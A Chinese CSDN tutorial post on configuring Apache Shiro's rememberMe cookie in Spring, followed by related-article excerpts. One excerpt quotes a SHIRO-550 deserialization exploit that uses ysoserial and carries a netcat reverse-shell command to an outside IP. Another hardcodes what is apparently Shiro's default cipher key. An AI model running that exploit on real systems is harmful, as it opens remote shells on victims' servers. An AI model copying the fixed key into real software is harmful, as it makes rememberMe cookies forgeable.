Shiro——rememberMe允许用户在下次访问应用时免除重新登录,保持持久性的登录状态

最新推荐文章于 2024-06-11 12:15:36 发布
最新推荐文章于 2024-06-11 12:15:36 发布
阅读量163 收藏 3
点赞数 9
分类专栏: 认证授权 文章标签: Shiro
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_82884096/article/details/138367398
版权

在Shiro中, rememberMe 功能允许用户在下次访问应用时免除重新登录,保持持久性的登录状态。

1. 配置Shiro RememberMe

在Shiro配置类中配置 cookiecookie管理器 ,启用 rememberMe 功能。

import org.apache.shiro.mgt.DefaultSecurityManager;
import org.apache.shiro.mgt.SecurityManager;
import org.apache.shiro.realm.Realm;
import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
import org.apache.shiro.web.servlet.SimpleCookie;
import org.apache.shiro.web.session.mgt.DefaultWebSessionManager;
import org.apache.shiro.web.session.mgt.DefaultWebSessionStorageEvaluator;
import org.apache.shiro.web.session.mgt.WebSessionManager;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;

@Configuration
public class ShiroConfig {

    @Bean
    public SecurityManager securityManager(Realm customRealm) {
        DefaultSecurityManager securityManager = new DefaultWebSecurityManager();
        securityManager.setRealm(customRealm);

        // 设置RememberMe Cookie
        SimpleCookie rememberMeCookie = new SimpleCookie("rememberMe");
        rememberMeCookie.setMaxAge(2592000); // 设置Cookie有效期30天
        securityManager.setRememberMeManager(rememberMeManager());

        return securityManager;
    }

    @Bean
    public Cookie rememberMeCookie() {
        SimpleCookie cookie = new SimpleCookie("rememberMe");
        cookie.setMaxAge(2592000); // 设置Cookie有效期30天
        return cookie;
    }

    @Bean
    public CookieRememberMeManager rememberMeManager() {
        CookieRememberMeManager rememberMeManager = new CookieRememberMeManager();
        rememberMeManager.setCookie(rememberMeCookie());
        rememberMeManager.setCipherKey(Base64.decode("yourBase64Key"));
        return rememberMeManager;
    }
}

2. 在登录逻辑中启用RememberMe

在登录逻辑中,设置 rememberMe 参数为 true ,以便在登录成功后生成 rememberMe Cookie。

import org.apache.shiro.SecurityUtils;
import org.apache.shiro.authc.UsernamePasswordToken;
import org.apache.shiro.subject.Subject;

public class LoginService {

    public void login(String username, String password, boolean rememberMe) {
        Subject currentUser = SecurityUtils.getSubject();
        UsernamePasswordToken token = new UsernamePasswordToken(username, password);
        token.setRememberMe(rememberMe);

        try {
            currentUser.login(token);
            System.out.println("Login successful!");
        } catch (AuthenticationException e) {
            System.out.println("Login failed: " + e.getMessage());
        }
    }
}

3. 在Controller中设置RememberMe

在Controller中设置 rememberMe 参数为 true ,以便在登录时启用 rememberMe 功能。

import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class LoginController {

    @PostMapping("/login")
    public String login(@RequestParam String username, @RequestParam String password, @RequestParam(required = false) boolean rememberMe) {
        LoginService loginService = new LoginService();
        loginService.login(username, password, rememberMe);
        return "Login successful!";
    }
}

通过上述代码,展示了如何在Shiro中结合 rememberMe 功能,配置 rememberMe Cookie并在登录逻辑中启用 rememberMe 参数。这样用户在下次访问应用时就可以免除重新登录,保持持久性的登录状态。

程序员阿皓
关注
  • 9
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shiro实现APP保持登录状态,以及web统一登录认证和权限管理,会话保持在web和APP之间。
gaofeihu_的博客
03-05 1万+
先说下背景,项目包含一个管理系统(web)和门户网站(web),还有一个手机APP(包括Android和IOS),三个系统共用一个后端,在后端使用shiro进行登录认证和权限控制。好的,那么问题来了:先说web端1.因为一般网页主需要记住7天密码(或者稍微更长)的功能就可以了,可以使用cookie实现,而且shiro也提供了记住密码的功能,在服务器端session不需要保存过长间。再说app端2...
Shiro的Remember Me
有志青年
09-02 2089
Shiro提供了Remember服务,AuthenticationToken需要实现org.apache.shiro.authc.RememberMeAuthenticationToken接口(UsernamePasswordtoken已经提供了这个接口)。 这个接口提供了一个方法 : boolean isRememberMe(); 如果这个方法设置为true,Shiro 将会在整个会话
Shiro进阶(四)Shiro之RememberMe
jwang的博客
05-13 6266
前言 本章讲解一下Shiro的记住我的功能 方法 1.概念 首先要澄清一点的是,这里的记住我并不是记住用户名和密码。 shiro的记住我是一种基于cookie实现的方式,特定的页面在关掉浏览器后(session消失)也可以进行访问的功能! 2.实现步骤 1)前台登录页面修改 如果需要记住我的功能,那么前台页面需要一个checkbox多选框来让用户进行勾选。 这里我就不...
Shiro框架封装cookie和session配置实现RememberMe效果------Shiro框架
最新发布
春风若有怜花意,可否许我再少年
06-11 952
Shiro框架封装cookie和session配置实现RememberMe效果------Shiro框架
Apache Shiro Remember Me服务
热门推荐
王浩的技术博客
03-29 1万+
Shiro提供Remember服务,AuthenticationToken需要实现org.apache.shiro.authc.RememberMeAuthenticationToken接口,此接口提供了一个方法: boolean isRememberMe(); 如果该方法返回true,则Shiro 将会在整个会话中记住终端用户的身份ID。 注:经常使用的Us
Shiro的rememberMe功能
weixin_65824274的博客
07-05 1608
登录后是可以正常访问/man的主页的,如果使用了记住我功能,会在浏览器写入cookie,关掉浏览器不需要登录即可直接访问/main.Shiro 提供了记住我(RememerMe)的功能,比如访问一些网站,关闭了浏览器,下次再打开还是能记住你是谁,下次访问无需再登录即可访问。4.但是,如果我们访问电商平台,如果要查看我的订单或进行支付,此还 是需要再进行身份认证的,以确保当前用户还是你。2.登录不勾选记住我,关闭浏览器访问主页/main还会拦截到登录页;1.配置记住我功能的cookie设置;
shiro - rememberMe
The Secret
02-07 284
applicationContext-shiro.xml 我这里只列出rememberMe需要添加的部分,详细的,最下面有。   <bean id="rememberMeCookie" class="org.apache.shiro.web.servlet.SimpleCookie"> <property name="name" value="...
Shiro记住我(RememberMe)
Hern(宋兆恒)
12-17 6125
简介 Shiro 提供了记住我(RememberMe)的功能,比如访问如淘宝 等一些网站,关闭了浏览器,下次再打开还是能记住你是谁, 下次访问无需再登录即可访问,基本流程如下: • 登录页面选中RememberMe然后登录成功;如果是浏览器登录,一般会把RememberMe 的Cookie写到客户端并保存下来; 关闭浏览器再重新打开;会发现浏览器还是记住你的; 访问一般的网页服务器端...
shiro实现单点登录(一个用户同一刻只能在一个地方登录)
09-01
单点登录是一种常见的安全机制,它允许用户在一次登录后访问多个相互关联的应用系统,而无需重新认证。在 Shiro 中,实现单点登录主要是通过控制用户的会话(Session)来完成的。以下是一个简单的步骤概述: 1. **...
Springboot+Shiro记录用户登录信息并获取当前登录用户信息的实现代码
08-19
用户登录,我们可以使用 Shiro 的 AuthenticationToken 来记录用户登录信息。 ```java UsernamePasswordToken token = new UsernamePasswordToken(username, password); Subject subject = SecurityUtils....
shiro获取登录状态用户信息
08-04
### Shiro 获取登录状态用户信息 在Java Web开发领域,Apache Shiro 是一个非常流行的权限管理框架。...以上就是关于如何在Shiro框架中获取用户登录状态用户信息的相关知识点。希望对你有所帮助!
SHIRO-550:Shiro RememberMe 1.2.4反序列化突破
03-10
Shiro RememberMe 1.2.4反序列化突破(SHIRO-550) commons-collections-3.2.1.jar java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "10.10.20.166:12345" |python exp.py java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'nc -e /bin/sh 192.168.5.86 8989' nc -nlvp 8989 python用法: python3 shiro_rce.py _____ _ _ _____ _____ ____ _____ _____ __
跟我学Shiro第13章Demo(RememberMe)
09-23
1. **RememberMe服务**:RememberMe服务是Shiro提供的一个组件,用于在用户登录记住他们的身份,以便在未来访问自动恢复登录状态。这个服务依赖于特定的RememberMe Manager,如基于Cookie的实现。 2. **...
shiro之记住登录信息
08-29
本文将详细介绍 Shiro 如何实现“记住登录信息”(RememberMe)的功能,帮助用户在关闭浏览器后仍能保持登录状态,以便在下次打开无需重新登录。 1. **RememberMe 的工作原理** RememberMe 功能主要依赖于 ...
Shiro安全框架》专题(十)-Shiro之rememberMe
02-02 1176
文章目录1.Remember me简介2.登录表单中添加记住我复选框3.配置文件中配置4.登录控制器5.测试 1.Remember me简介 Shiro提供了记住我(RememberMe)的功能,比如访问如淘宝等一些网站,关闭了浏览器下次再打开还是能记住你是谁,下次访问无需再登录即可访问,基本流程如下: 1.首先在登录页面选中RememberMe然后登录成功;如果是浏览器登录,一般会把RememberMe的Cookie写到客户端并保存下来; 2.关闭浏览器再重新打开;会发现浏览器还是记住你的; 3.访
第十三章 RememberMe——《跟我学Shiro
cihongmo6452的博客
03-21 138
目录贴:跟我学Shiro目录贴 Shiro提供了记住我(RememberMe)的功能,比如访问如淘宝等一些网站,关闭了浏览器下次再打开还是能记住你是谁,下次访问无需再登录即可访问,基本流程如下: 1、首先在登录页面选中RememberMe然后登录成功;如果是浏览器登录,一般会...
shiro框架如何保持登录状态
weixin_40835745的博客
12-17 3965
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、shiro保持登录状态的方式?二、具体过程1.登录系统2.关闭浏览器3.登出系统4.RememberMe功能总结 前言 最近一段间在研究shiro框架,发现网上很少有讲在登录之后,shiro是如何保持登陆状态的,或者换句话说就是后台服务能够在你登录之后,知道你是谁,知道你有哪些权限,知道你的角色是什么 一、shiro保持登录状态的方式? 现在大部分的web项目都是采用前后端分离的架构,而保持登录状态采用的最多的方式是请
Shiro(十):shiro RememberMe(记住我)
12程序猿的博客
10-29 2040
shiro RememberMe(记住我) 一、概述 Shiro 提供了记住我(RememberMe)的功能,比如访问如淘宝等一些网站,关闭了浏览器,下次再打开还是能记住你是谁,下次访问无需再登录即可访问, 基本流程如下: 首先在登录页面选中 RememberMe 然后登录成功;如果是浏览器登录,一般会把 RememberMe 的Cookie 写到客户端并保存下来; 关闭浏览器再重新打开;会发现浏览器还是记住你的; 访问一般的网页服务器端还是知道你是谁,且能正常访问; 但是比如我们访问淘宝,如果要
第十三章 RememberMe——《跟我学Shiro
jinnianshilongnian的专栏
03-17 796
  目录贴: 跟我学Shiro目录贴   Shiro提供了记住我(RememberMe)的功能,比如访问如淘宝等一些网站,关闭了浏览器下次再打开还是能记住你是谁,下次访问无需再登录即可访问,基本流程如下: 1、首先在登录页面选中RememberMe然后登录成功;如果是浏览器登录,一般会把RememberMe的Cookie写到客户端并保存下来; 2、关闭浏览器再重新打开;会发现浏览...
shiro rememberme功能怎么保持用户在关闭浏览器后用户信息还是上一次状态
06-07
Shiro的RememberMe功能可以帮助用户在关闭浏览器后也能保持登录状态,实现方法是在用户登录,生成一个RememberMe Cookie,并将它保存在用户的浏览器中。下次用户次访问网站,如果没有进行登录操作,Shiro会自动读取这个Cookie,从而实现自动登录。 为了保持用户状态,在生成RememberMe Cookie,可以设置它的过期间。如果没有设置过期间,Cookie将在浏览器关闭自动删除。 下面是一个示例代码,演示如何生成RememberMe Cookie并设置它的过期间: ``` // 创建一个RememberMe Cookie SimpleCookie rememberMeCookie = new SimpleCookie("rememberMe"); // 设置Cookie的过期间为7天 rememberMeCookie.setMaxAge(7 * 24 * 60 * 60); // 将Cookie保存到用户的浏览器中 Subject currentUser = SecurityUtils.getSubject(); currentUser.getSession().setAttribute("rememberMeCookie", rememberMeCookie); ``` 在上述代码中,我们创建了一个名为rememberMe的Cookie,并将它的过期间设置为7天。接着,我们将Cookie保存到用户的Session中,以便在下次访问网站可以读取它。 为了读取RememberMe Cookie,我们可以在Shiro的配置文件中添加如下内容: ``` [main] securityManager.rememberMeManager.cookie = org.apache.shiro.web.servlet.SimpleCookie securityManager.rememberMeManager.cookie.name = rememberMe securityManager.rememberMeManager.cookie.maxAge = 604800 securityManager.rememberMeManager.cipherKey = kPH+bIxk5D2deZiIxcaaaA== ``` 在这个配置中,我们设置了RememberMe Cookie的名称为rememberMe,并将它的过期间设置为7天。如果想要读取更多的Cookie属性,可以查看SimpleCookie类的API文档。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值